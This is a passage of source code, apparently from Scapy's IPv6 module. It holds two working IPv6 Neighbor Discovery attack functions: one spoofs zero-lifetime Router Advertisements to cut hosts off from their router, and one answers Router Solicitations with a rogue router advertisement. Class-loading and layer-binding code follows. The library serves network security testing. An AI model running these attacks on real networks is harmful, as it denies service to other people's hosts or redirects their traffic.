    More precisely, following arguments can be used to change the behavior:

    iface: a specific interface (e.g. "eth0") of the system on which the
         DoS should be launched. If None is provided conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only RA messages received from this source will trigger replies.
         If other default routers advertised their presence on the link,
         their clients will not be impacted by the attack. The default
         value is None: the DoS is not limited to a specific mac address.

    ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
         on. Only RA messages received from this source address will trigger
         replies. If other default routers advertised their presence on the
         link, their clients will not be impacted by the attack. The default
         value is None: the DoS is not limited to a specific IPv6 source
         address.

    reply_mac: allow specifying a specific source mac address for the reply,
         i.e. to prevent the use of the mac address of the interface.

    tgt_mac: allow limiting the effect of the DoS to a specific host,
         by sending the "invalidating RA" only to its mac address.
    """

    def is_request(req, mac_src_filter, ip_src_filter):
        """
        Tell (1 or 0) whether req is a default router RA matching the filters
        """

        if Ether not in req or IPv6 not in req or ICMPv6ND_RA not in req:
            return 0

        if mac_src_filter and req[Ether].src != mac_src_filter:
            return 0

        if ip_src_filter and req[IPv6].src != ip_src_filter:
            return 0

        # Only a non-zero Router Lifetime advertises a Default Router
        return 0 if req[ICMPv6ND_RA].routerlifetime == 0 else 1

    def ra_reply_callback(req, reply_mac, tgt_mac, iface):
        """
        Answer the RA carried by req with a similar RA having a 0 lifetime
        """

        router_addr = req[IPv6].src

        # Only the Ethernet addresses that are set are forced on the reply
        l2_fields = {name: addr
                     for name, addr in (("src", reply_mac), ("dst", tgt_mac))
                     if addr}

        # Fake RA skeleton (high pref, zero lifetime), spoofing the router
        fake_ra = (
            Ether(**l2_fields) /
            IPv6(src=router_addr, dst="ff02::1") /
            ICMPv6ND_RA(prf=1, routerlifetime=0)
        )

        # Move every Prefix Information option of the request to the fake
        # RA. Each option is detached from its own payload before being
        # appended, the walk going on in what followed it.
        remaining = req
        while ICMPv6NDOptPrefixInfo in remaining:
            prefix_opt = remaining[ICMPv6NDOptPrefixInfo]
            remaining = prefix_opt.payload
            del prefix_opt.payload
            fake_ra /= prefix_opt

        # Source link layer address option: the one advertised in the
        # request when present, the Ethernet source of the request otherwise
        if ICMPv6NDOptSrcLLAddr in req:
            router_lladdr = req[ICMPv6NDOptSrcLLAddr].lladdr
        else:
            router_lladdr = req[Ether].src
        fake_ra /= ICMPv6NDOptSrcLLAddr(lladdr=router_lladdr)

        sendp(fake_ra, iface=iface, verbose=0)

        print("Fake RA sent with source address %s" % router_addr)

    iface = iface or conf.iface

    # Our own frames are excluded from the capture, which requires knowing
    # the source mac address used for the replies.
    reply_mac = reply_mac or get_if_hwaddr(iface)
    capture_filter = "icmp6 and not ether src %s" % reply_mac

    def _wanted(pkt):
        return is_request(pkt, mac_src_filter, ip_src_filter)

    def _answer(pkt):
        return ra_reply_callback(pkt, reply_mac, tgt_mac, iface)

    sniff(store=0,
          filter=capture_filter,
          lfilter=_wanted,
          prn=_answer,
          iface=iface)

4104 

4105 

def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
                           ip_src_filter=None):
    """
    Send the provided RA message at layer 2 (i.e. providing a packet
    starting with IPv6 will not work) in response to received RS messages.
    In the end, the function is a simple wrapper around sendp() that
    monitors the link for RS messages.

    It is probably better explained with an example:

      >>> ra  = Ether()/IPv6()/ICMPv6ND_RA()
      >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
      >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
      >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
      >>> NDP_Attack_Fake_Router(ra, iface="eth0")
      Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
      Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
      ...

    Following arguments can be used to change the behavior:

      ra: the RA message to send in response to received RS message.

      iface: a specific interface (e.g. "eth0") of the system on which the
             DoS should be launched. If none is provided, conf.iface is
             used.

      mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only RS messages received from this source will trigger a reply.
         Note that no change is made to the provided RA, which implies that
         if you intend to target only the source of the RS using this
         option, you will have to set the Ethernet destination address to
         the same value in your RA.
         The default value for this parameter is None: no filtering on the
         source of RS is done.

      ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
         on. Only RS messages received from this source address will trigger
         replies. Same comment as for previous argument applies: if you use
         the option, you will probably want to set a specific Ethernet
         destination address in the RA.
    """

    def is_request(req, mac_src_filter, ip_src_filter):
        """
        Tell (1 or 0) whether req is a RS matching the provided filters
        """

        if Ether not in req or IPv6 not in req or ICMPv6ND_RS not in req:
            return 0

        if mac_src_filter and req[Ether].src != mac_src_filter:
            return 0

        if ip_src_filter and req[IPv6].src != ip_src_filter:
            return 0

        return 1

    def ra_reply_callback(req, iface):
        """
        Send the user-provided RA, unmodified, in reply to the RS in req
        """

        solicitor = req[IPv6].src
        sendp(ra, iface=iface, verbose=0)
        print("Fake RA sent in response to RS from %s" % solicitor)

    iface = iface or conf.iface

    def _wanted(pkt):
        return is_request(pkt, mac_src_filter, ip_src_filter)

    def _answer(pkt):
        return ra_reply_callback(pkt, iface)

    sniff(store=0,
          filter="icmp6",
          lfilter=_wanted,
          prn=_answer,
          iface=iface)

4185 

4186############################################################################# 

4187# Pre-load classes ## 

4188############################################################################# 

4189 

4190 

def _get_cls(name):
    """
    Return the module-level object called name, or Raw when this module
    defines no such name.
    """
    module_namespace = globals()
    return module_namespace.get(name, Raw)

4193 

4194 

def _load_dict(d):
    """
    Replace, in place, each name stored as a value of d by the object
    _get_cls() resolves it to.
    """
    # Keys are left untouched: only the values of existing entries change.
    for key in list(d):
        d[key] = _get_cls(d[key])

4198 

4199 

# Now that the whole module is defined, swap the names held by the lookup
# tables for the objects they designate (Raw for names defined nowhere).
_load_dict(icmp6ndoptscls)
_load_dict(icmp6typescls)
_load_dict(ipv6nhcls)

4203 

4204############################################################################# 

4205############################################################################# 

4206# Layers binding # 

4207############################################################################# 

4208############################################################################# 

4209 

# Register the classes associated with layer 3 (EtherType) and layer 2
# (link type) numbers in the configuration tables.
# NOTE(review): register_num2layer() presumably only registers the
# number -> class direction, unlike register() - confirm.
conf.l3types.register(ETH_P_IPV6, IPv6)
conf.l3types.register_num2layer(ETH_P_ALL, IPv46)
conf.l2types.register(31, IPv6)
conf.l2types.register(DLT_IPV6, IPv6)
conf.l2types.register(DLT_RAW, IPv46)
conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46)

# Lower layers carrying IPv6: 0x86dd is the EtherType assigned to IPv6
bind_layers(Ether, IPv6, type=0x86dd)
bind_layers(CookedLinux, IPv6, proto=0x86dd)
bind_layers(GRE, IPv6, proto=0x86dd)
bind_layers(SNAP, IPv6, code=0x86dd)
# AF_INET6 values are platform-dependent. For a detailed explanation, read
# https://github.com/the-tcpdump-group/libpcap/blob/f98637ad7f086a34c4027339c9639ae1ef842df3/gencode.c#L3333-L3354  # noqa: E501
if WINDOWS:
    bind_layers(Loopback, IPv6, type=0x18)
else:
    bind_layers(Loopback, IPv6, type=socket.AF_INET6)
# Upper layers and tunnels, selected by the Next Header (nh) value of IPv6
# or by the Protocol (proto) value of IPv4
bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP)
bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP)
bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP)
bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP)
bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6)
bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6)
bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP)
bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)